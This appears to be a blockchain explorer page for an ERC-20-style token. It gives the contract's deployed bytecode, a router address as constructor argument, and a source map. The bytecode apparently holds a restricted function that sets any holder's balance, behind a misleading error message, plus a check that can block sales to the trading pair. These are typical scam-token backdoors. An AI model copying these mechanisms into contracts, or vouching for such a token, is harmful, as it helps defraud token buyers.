0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b806370a08231146101ec578063715018a6146102155780638c0b5e221461021d5780638da5cb5b1461022657806395d89b411461024157600080fd5b8063313ce567116100f4578063313ce567146101ac578063333e6f06146101bb57806339509351146101c457806344489ad1146101d757806362256589146101e457600080fd5b806306fdde031461013157806307ce29a71461014f578063095ea7b31461016457806318160ddd1461018757806323b872dd14610199575b600080fd5b6101396102de565b6040516101469190610f18565b60405180910390f35b61016261015d366004610f7b565b610370565b005b610177610172366004610fc2565b61040a565b6040519015158152602001610146565b6005545b604051908152602001610146565b6101776101a7366004610fee565b610421565b60405160098152602001610146565b61018b600a5481565b6101776101d2366004610fc2565b6104d2565b6008546101779060ff1681565b610162610509565b61018b6101fa36600461102f565b6001600160a01b031660009081526003602052604090205490565b610162610520565b61018b60095481565b6000546040516001600160a01b039091168152602001610146565b610139610534565b61017761025736600461102f565b600b6020526000908152604090205460ff1681565b61017761027a366004610fc2565b610543565b61017761028d366004610fc2565b6105de565b61018b6102a0366004611053565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101626102d936600461102f565b6105eb565b6060600680546102ed9061108c565b80601f01602080910402602001604051908101604052809291908181526020018280546103199061108c565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b6001546001600160a01b03163381146103a45760405162461bcd60e51b815260040161039b906110c6565b60405180910390fd5b6001821515146103c65760405162461bcd60e51b815260040161039b906110c6565b6001600160a01b0384166103ec5760405162461bcd60e51b815260040161039b90611107565b50506001600160a01b03909116600090815260036020526040902055565b6000610417338484610664565b5060015b92915050565b600061042e84848461074d565b6001600160a01b0384166000908152600460209081526040808320338452909152902054828110156104b35760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161039b565b6104c785336104c2868561115f565b610664565b506001949350505050565b3360008181526004602090815260408083206001600160a01b038716845290915281205490916104179185906104c2908690611172565b6105116108e4565b6008805460ff19166001179055565b6105286108e4565b610532600061093e565b565b6060600780546102ed9061108c565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105c55760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161039b565b6105d433856104c2868561115f565b5060019392505050565b600061041733848461074d565b6105f36108e4565b6001600160a01b0381166106585760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161039b565b6106618161093e565b50565b6001600160a01b0383166106c65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161039b565b6001600160a01b0382166106ec5760405162461bcd60e51b815260040161039b90611107565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107735760405162461bcd60e51b815260040161039b90611185565b6001600160a01b0382166107995760405162461bcd60e51b815260040161039b906111ca565b6107a48383836109a6565b806000036107b157505050565b6001600160a01b0383166000908152600b602052604090205460ff161580156107f357506001600160a01b0382166000908152600b602052604090205460ff16155b156108d457600d546001600160a01b039081169083160361087657600e546001600160a01b0316600090815260036020526040902054156108765760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e00604482015260640161039b565b600d546001600160a01b038481169116148061089f5750600d546001600160a01b038381169116145b156108d45760006064600c54836108b6919061120d565b6108c09190611224565b90506108ce84848484610c71565b50505050565b6108df838383610df9565b505050565b6000546001600160a01b031633146105325760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161039b565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108df576001600160a01b0383166000908152600b602052604090205460ff161580156109f257506001600160a01b0382166000908152600b602052604090205460ff16155b156108df57600954811115610a3e5760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b604482015260640161039b565b600d546001600160a01b0316610bdb57600e60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610aa1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ac59190611246565b6001600160a01b031663e6a4390530600e60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b27573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b4b9190611246565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015610b96573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bba9190611246565b600d80546001600160a01b0319166001600160a01b03929092169190911790555b600d546001600160a01b0390811690831603610bf657505050565b600a5481610c19846001600160a01b031660009081526003602052604090205490565b610c239190611172565b11156108df5760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d61780000000000000000604482015260640161039b565b6001600160a01b038416610c975760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038316610cbd5760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03841660009081526003602052604090205482811015610cf65760405162461bcd60e51b815260040161039b90611263565b6001600160a01b03851660009081526003602052604090208382039055610d1d828461115f565b92508160056000828254610d31919061115f565b90915550506001600160a01b03841660009081526003602052604081208054859290610d5e908490611172565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610dea91815260200190565b60405180910390a35050505050565b6001600160a01b038316610e1f5760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038216610e455760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03831660009081526003602052604090205481811015610e7e5760405162461bcd60e51b815260040161039b90611263565b610e88828261115f565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610ebe908490611172565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f0a91815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f4557858101830151858201604001528201610f29565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461066157600080fd5b600080600060608486031215610f9057600080fd5b8335610f9b81610f66565b92506020840135915060408401358015158114610fb757600080fd5b809150509250925092565b60008060408385031215610fd557600080fd5b8235610fe081610f66565b946020939093013593505050565b60008060006060848603121561100357600080fd5b833561100e81610f66565b9250602084013561101e81610f66565b929592945050506040919091013590565b60006020828403121561104157600080fd5b813561104c81610f66565b9392505050565b6000806040838503121561106657600080fd5b823561107181610f66565b9150602083013561108181610f66565b809150509250929050565b600181811c908216806110a057607f821691505b6020821081036110c057634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526021908201527f45524332303a20617070726f76652066726f6d206f776e6572206164647265736040820152607360f81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b8181038181111561041b5761041b611149565b8082018082111561041b5761041b611149565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761041b5761041b611149565b60008261124157634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121561125857600080fd5b815161104c81610f66565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea26469706673582212204a0d2b690441583d6e74c74d73ee6373c7622de278b5b3d94e925fd5fc6700b864736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000891212b9b6a5c19a20972e4a34afa0a088ba0c7c

-----Decoded View---------------
Arg [0] : router (address): 0x891212B9b6A5C19a20972e4A34aFA0a088ba0C7c

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000891212b9b6a5c19a20972e4a34afa0a088ba0c7c


Deployed Bytecode Sourcemap

17905:2650:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8444:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14723:391;;;;;;:::i;:::-;;:::i;:::-;;10610:169;;;;;;:::i;:::-;;:::i;:::-;;;1677:14:1;;1670:22;1652:41;;1640:2;1625:18;10610:169:0;1512:187:1;9563:108:0;9651:12;;9563:108;;;1850:25:1;;;1838:2;1823:18;9563:108:0;1704:177:1;11261:422:0;;;;;;:::i;:::-;;:::i;9406:92::-;;;9489:1;2489:36:1;;2477:2;2462:18;9406:92:0;2347:184:1;18230:25:0;;;;;;12092:215;;;;;;:::i;:::-;;:::i;18170:20::-;;;;;;;;;20476:76;;;:::i;9734:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;9835:18:0;9808:7;9835:18;;;:9;:18;;;;;;;9734:127;1980:103;;;:::i;18197:26::-;;;;;;1330:87;1376:7;1403:6;1330:87;;-1:-1:-1;;;;;1403:6:0;;;2934:51:1;;2922:2;2907:18;1330:87:0;2788:203:1;8663:104:0;;;:::i;18262:43::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;12810:377;;;;;;:::i;:::-;;:::i;10074:175::-;;;;;;:::i;:::-;;:::i;10312:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10428:18:0;;;10401:7;10428:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;10312:151;2239:201;;;;;;:::i;:::-;;:::i;8444:100::-;8498:13;8531:5;8524:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8444:100;:::o;14723:391::-;14829:8;;-1:-1:-1;;;;;14829:8:0;14858:10;:20;;14850:66;;;;-1:-1:-1;;;14850:66:0;;;;;;;:::i;:::-;;;;;;;;;14945:4;14935:14;;;;14927:60;;;;-1:-1:-1;;;14927:60:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15006:21:0;;14998:68;;;;-1:-1:-1;;;14998:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;;;15079:18:0;;;;;;;:9;:18;;;;;:27;14723:391::o;10610:169::-;10693:4;10710:39;365:10;10733:7;10742:6;10710:8;:39::i;:::-;-1:-1:-1;10767:4:0;10610:169;;;;;:::o;11261:422::-;11367:4;11384:36;11394:6;11402:9;11413:6;11384:9;:36::i;:::-;-1:-1:-1;;;;;11460:19:0;;11433:24;11460:19;;;:11;:19;;;;;;;;365:10;11460:33;;;;;;;;11512:26;;;;11504:79;;;;-1:-1:-1;;;11504:79:0;;4781:2:1;11504:79:0;;;4763:21:1;4820:2;4800:18;;;4793:30;4859:34;4839:18;;;4832:62;-1:-1:-1;;;4910:18:1;;;4903:38;4958:19;;11504:79:0;4579:404:1;11504:79:0;11594:57;11603:6;365:10;11625:25;11644:6;11625:16;:25;:::i;:::-;11594:8;:57::i;:::-;-1:-1:-1;11671:4:0;;11261:422;-1:-1:-1;;;;11261:422:0:o;12092:215::-;365:10;12180:4;12229:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;12229:34:0;;;;;;;;;;12180:4;;12197:80;;12220:7;;12229:47;;12266:10;;12229:47;:::i;20476:76::-;1215:13;:11;:13::i;:::-;20529:8:::1;:15:::0;;-1:-1:-1;;20529:15:0::1;20540:4;20529:15;::::0;;20476:76::o;1980:103::-;1215:13;:11;:13::i;:::-;2045:30:::1;2072:1;2045:18;:30::i;:::-;1980:103::o:0;8663:104::-;8719:13;8752:7;8745:14;;;;;:::i;12810:377::-;365:10;12903:4;12947:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;12947:34:0;;;;;;;;;;13000:35;;;;12992:85;;;;-1:-1:-1;;;12992:85:0;;5585:2:1;12992:85:0;;;5567:21:1;5624:2;5604:18;;;5597:30;5663:34;5643:18;;;5636:62;-1:-1:-1;;;5714:18:1;;;5707:35;5759:19;;12992:85:0;5383:401:1;12992:85:0;13088:67;365:10;13111:7;13120:34;13139:15;13120:16;:34;:::i;13088:67::-;-1:-1:-1;13175:4:0;;12810:377;-1:-1:-1;;;12810:377:0:o;10074:175::-;10160:4;10177:42;365:10;10201:9;10212:6;10177:9;:42::i;2239:201::-;1215:13;:11;:13::i;:::-;-1:-1:-1;;;;;2328:22:0;::::1;2320:73;;;::::0;-1:-1:-1;;;2320:73:0;;5991:2:1;2320:73:0::1;::::0;::::1;5973:21:1::0;6030:2;6010:18;;;6003:30;6069:34;6049:18;;;6042:62;-1:-1:-1;;;6120:18:1;;;6113:36;6166:19;;2320:73:0::1;5789:402:1::0;2320:73:0::1;2404:28;2423:8;2404:18;:28::i;:::-;2239:201:::0;:::o;16684:346::-;-1:-1:-1;;;;;16786:19:0;;16778:68;;;;-1:-1:-1;;;16778:68:0;;6398:2:1;16778:68:0;;;6380:21:1;6437:2;6417:18;;;6410:30;6476:34;6456:18;;;6449:62;-1:-1:-1;;;6527:18:1;;;6520:34;6571:19;;16778:68:0;6196:400:1;16778:68:0;-1:-1:-1;;;;;16865:21:0;;16857:68;;;;-1:-1:-1;;;16857:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;16938:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;16990:32;;1850:25:1;;;16990:32:0;;1823:18:1;16990:32:0;;;;;;;16684:346;;;:::o;18872:894::-;-1:-1:-1;;;;;19004:18:0;;18996:68;;;;-1:-1:-1;;;18996:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;19083:16:0;;19075:64;;;;-1:-1:-1;;;19075:64:0;;;;;;;:::i;:::-;19153:34;19170:4;19176:2;19180:6;19153:16;:34::i;:::-;19204:6;19214:1;19204:11;19200:50;;18872:894;;;:::o;19200:50::-;-1:-1:-1;;;;;19267:17:0;;;;;;:11;:17;;;;;;;;19266:18;:38;;;;-1:-1:-1;;;;;;19289:15:0;;;;;;:11;:15;;;;;;;;19288:16;19266:38;19262:451;;;19329:13;;-1:-1:-1;;;;;19329:13:0;;;19323:19;;;;19320:142;;19388:15;;-1:-1:-1;;;;;19388:15:0;9808:7;9835:18;;;:9;:18;;;;;;19370:40;19362:84;;;;-1:-1:-1;;;19362:84:0;;7613:2:1;19362:84:0;;;7595:21:1;7652:2;7632:18;;;7625:30;7691:33;7671:18;;;7664:61;7742:18;;19362:84:0;7411:355:1;19362:84:0;19490:13;;-1:-1:-1;;;;;19482:21:0;;;19490:13;;19482:21;;:44;;-1:-1:-1;19513:13:0;;-1:-1:-1;;;;;19507:19:0;;;19513:13;;19507:19;19482:44;19478:224;;;19547:13;19589:3;19573:12;;19564:6;:21;;;;:::i;:::-;19563:29;;;;:::i;:::-;19547:45;;19613:48;19637:4;19643:2;19647:6;19655:5;19613:23;:48::i;:::-;19680:7;18872:894;;;:::o;19478:224::-;19725:33;19741:4;19747:2;19751:6;19725:15;:33::i;:::-;18872:894;;;:::o;1496:132::-;1376:7;1403:6;-1:-1:-1;;;;;1403:6:0;365:10;1560:23;1552:68;;;;-1:-1:-1;;;1552:68:0;;8368:2:1;1552:68:0;;;8350:21:1;;;8387:18;;;8380:30;8446:34;8426:18;;;8419:62;8498:18;;1552:68:0;8166:356:1;2601:219:0;2686:6;;;;2675:17;;-1:-1:-1;;;;;;2675:17:0;;;-1:-1:-1;;;;;2686:6:0;;;2675:17;;;;;;2703;;;;;;;;;;2731:14;:25;;;;;;;;;2772:40;;2703:17;;2686:6;;2772:40;;2686:6;2772:40;2601:219;:::o;19774:694::-;19901:8;;;;19896:565;;-1:-1:-1;;;;;19931:17:0;;;;;;:11;:17;;;;;;;;19930:18;:38;;;;-1:-1:-1;;;;;;19953:15:0;;;;;;:11;:15;;;;;;;;19952:16;19930:38;19926:524;;;20007:11;;19997:6;:21;;19989:52;;;;-1:-1:-1;;;19989:52:0;;8729:2:1;19989:52:0;;;8711:21:1;8768:2;8748:18;;;8741:30;-1:-1:-1;;;8787:18:1;;;8780:48;8845:18;;19989:52:0;8527:342:1;19989:52:0;20066:13;;-1:-1:-1;;;;;20066:13:0;20062:176;;20145:15;;;;;;;;;-1:-1:-1;;;;;20145:15:0;-1:-1:-1;;;;;20145:23:0;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;20127:52:0;;20188:4;20195:15;;;;;;;;;-1:-1:-1;;;;;20195:15:0;-1:-1:-1;;;;;20195:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;20127:91;;-1:-1:-1;;;;;;20127:91:0;;;;;;;-1:-1:-1;;;;;9360:15:1;;;20127:91:0;;;9342:34:1;9412:15;;9392:18;;;9385:43;9277:18;;20127:91:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;20111:13;:107;;-1:-1:-1;;;;;;20111:107:0;-1:-1:-1;;;;;20111:107:0;;;;;;;;;;20062:176;20269:13;;-1:-1:-1;;;;;20269:13:0;;;20263:19;;;;20259:74;;19774:694;;;:::o;20259:74::-;20395:10;;20385:6;20369:13;20379:2;-1:-1:-1;;;;;9835:18:0;9808:7;9835:18;;;:9;:18;;;;;;;9734:127;20369:13;:22;;;;:::i;:::-;:36;;20361:73;;;;-1:-1:-1;;;20361:73:0;;9641:2:1;20361:73:0;;;9623:21:1;9680:2;9660:18;;;9653:30;9719:26;9699:18;;;9692:54;9763:18;;20361:73:0;9439:348:1;15448:798:0;-1:-1:-1;;;;;15584:20:0;;15576:70;;;;-1:-1:-1;;;15576:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15665:23:0;;15657:71;;;;-1:-1:-1;;;15657:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15825:17:0;;15801:21;15825:17;;;:9;:17;;;;;;15861:23;;;;15853:74;;;;-1:-1:-1;;;15853:74:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15965:17:0;;;;;;:9;:17;;;;;15985:22;;;15965:42;;16031:22;16041:12;16001:6;16031:22;:::i;:::-;;;16080:12;16064;;:28;;;;;;;:::i;:::-;;;;-1:-1:-1;;;;;;;16103:20:0;;;;;;:9;:20;;;;;:30;;16127:6;;16103:20;:30;;16127:6;;16103:30;:::i;:::-;;;;-1:-1:-1;;16151:36:0;;1850:25:1;;;7645:42:0;;-1:-1:-1;;;;;16151:36:0;;;;;1838:2:1;1823:18;16151:36:0;;;;;;;16220:9;-1:-1:-1;;;;;16203:35:0;16212:6;-1:-1:-1;;;;;16203:35:0;;16231:6;16203:35;;;;1850:25:1;;1838:2;1823:18;;1704:177;16203:35:0;;;;;;;;15565:681;15448:798;;;;:::o;13677:604::-;-1:-1:-1;;;;;13783:20:0;;13775:70;;;;-1:-1:-1;;;13775:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;13864:23:0;;13856:71;;;;-1:-1:-1;;;13856:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14024:17:0;;14000:21;14024:17;;;:9;:17;;;;;;14060:23;;;;14052:74;;;;-1:-1:-1;;;14052:74:0;;;;;;;:::i;:::-;14157:22;14173:6;14157:13;:22;:::i;:::-;-1:-1:-1;;;;;14137:17:0;;;;;;;:9;:17;;;;;;:42;;;;14190:20;;;;;;;;:30;;14214:6;;14137:17;14190:30;;14214:6;;14190:30;:::i;:::-;;;;;;;;14255:9;-1:-1:-1;;;;;14238:35:0;14247:6;-1:-1:-1;;;;;14238:35:0;;14266:6;14238:35;;;;1850:25:1;;1838:2;1823:18;;1704:177;14238:35:0;;;;;;;;13764:517;13677:604;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:484;777:6;785;793;846:2;834:9;825:7;821:23;817:32;814:52;;;862:1;859;852:12;814:52;901:9;888:23;920:31;945:5;920:31;:::i;:::-;970:5;-1:-1:-1;1022:2:1;1007:18;;994:32;;-1:-1:-1;1078:2:1;1063:18;;1050:32;1120:15;;1113:23;1101:36;;1091:64;;1151:1;1148;1141:12;1091:64;1174:7;1164:17;;;703:484;;;;;:::o;1192:315::-;1260:6;1268;1321:2;1309:9;1300:7;1296:23;1292:32;1289:52;;;1337:1;1334;1327:12;1289:52;1376:9;1363:23;1395:31;1420:5;1395:31;:::i;:::-;1445:5;1497:2;1482:18;;;;1469:32;;-1:-1:-1;;;1192:315:1:o;1886:456::-;1963:6;1971;1979;2032:2;2020:9;2011:7;2007:23;2003:32;2000:52;;;2048:1;2045;2038:12;2000:52;2087:9;2074:23;2106:31;2131:5;2106:31;:::i;:::-;2156:5;-1:-1:-1;2213:2:1;2198:18;;2185:32;2226:33;2185:32;2226:33;:::i;:::-;1886:456;;2278:7;;-1:-1:-1;;;2332:2:1;2317:18;;;;2304:32;;1886:456::o;2536:247::-;2595:6;2648:2;2636:9;2627:7;2623:23;2619:32;2616:52;;;2664:1;2661;2654:12;2616:52;2703:9;2690:23;2722:31;2747:5;2722:31;:::i;:::-;2772:5;2536:247;-1:-1:-1;;;2536:247:1:o;2996:388::-;3064:6;3072;3125:2;3113:9;3104:7;3100:23;3096:32;3093:52;;;3141:1;3138;3131:12;3093:52;3180:9;3167:23;3199:31;3224:5;3199:31;:::i;:::-;3249:5;-1:-1:-1;3306:2:1;3291:18;;3278:32;3319:33;3278:32;3319:33;:::i;:::-;3371:7;3361:17;;;2996:388;;;;;:::o;3389:380::-;3468:1;3464:12;;;;3511;;;3532:61;;3586:4;3578:6;3574:17;3564:27;;3532:61;3639:2;3631:6;3628:14;3608:18;3605:38;3602:161;;3685:10;3680:3;3676:20;3673:1;3666:31;3720:4;3717:1;3710:15;3748:4;3745:1;3738:15;3602:161;;3389:380;;;:::o;3774:397::-;3976:2;3958:21;;;4015:2;3995:18;;;3988:30;4054:34;4049:2;4034:18;;4027:62;-1:-1:-1;;;4120:2:1;4105:18;;4098:31;4161:3;4146:19;;3774:397::o;4176:398::-;4378:2;4360:21;;;4417:2;4397:18;;;4390:30;4456:34;4451:2;4436:18;;4429:62;-1:-1:-1;;;4522:2:1;4507:18;;4500:32;4564:3;4549:19;;4176:398::o;4988:127::-;5049:10;5044:3;5040:20;5037:1;5030:31;5080:4;5077:1;5070:15;5104:4;5101:1;5094:15;5120:128;5187:9;;;5208:11;;;5205:37;;;5222:18;;:::i;5253:125::-;5318:9;;;5339:10;;;5336:36;;;5352:18;;:::i;6601:401::-;6803:2;6785:21;;;6842:2;6822:18;;;6815:30;6881:34;6876:2;6861:18;;6854:62;-1:-1:-1;;;6947:2:1;6932:18;;6925:35;6992:3;6977:19;;6601:401::o;7007:399::-;7209:2;7191:21;;;7248:2;7228:18;;;7221:30;7287:34;7282:2;7267:18;;7260:62;-1:-1:-1;;;7353:2:1;7338:18;;7331:33;7396:3;7381:19;;7007:399::o;7771:168::-;7844:9;;;7875;;7892:15;;;7886:22;;7872:37;7862:71;;7913:18;;:::i;7944:217::-;7984:1;8010;8000:132;;8054:10;8049:3;8045:20;8042:1;8035:31;8089:4;8086:1;8079:15;8117:4;8114:1;8107:15;8000:132;-1:-1:-1;8146:9:1;;7944:217::o;8874:251::-;8944:6;8997:2;8985:9;8976:7;8972:23;8968:32;8965:52;;;9013:1;9010;9003:12;8965:52;9045:9;9039:16;9064:31;9089:5;9064:31;:::i;9792:402::-;9994:2;9976:21;;;10033:2;10013:18;;;10006:30;10072:34;10067:2;10052:18;;10045:62;-1:-1:-1;;;10138:2:1;10123:18;;10116:36;10184:3;10169:19;;9792:402::o

Swarm Source

ipfs://4a0d2b690441583d6e74c74d73ee6373c7622de278b5b3d94e925fd5fc6700b8
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.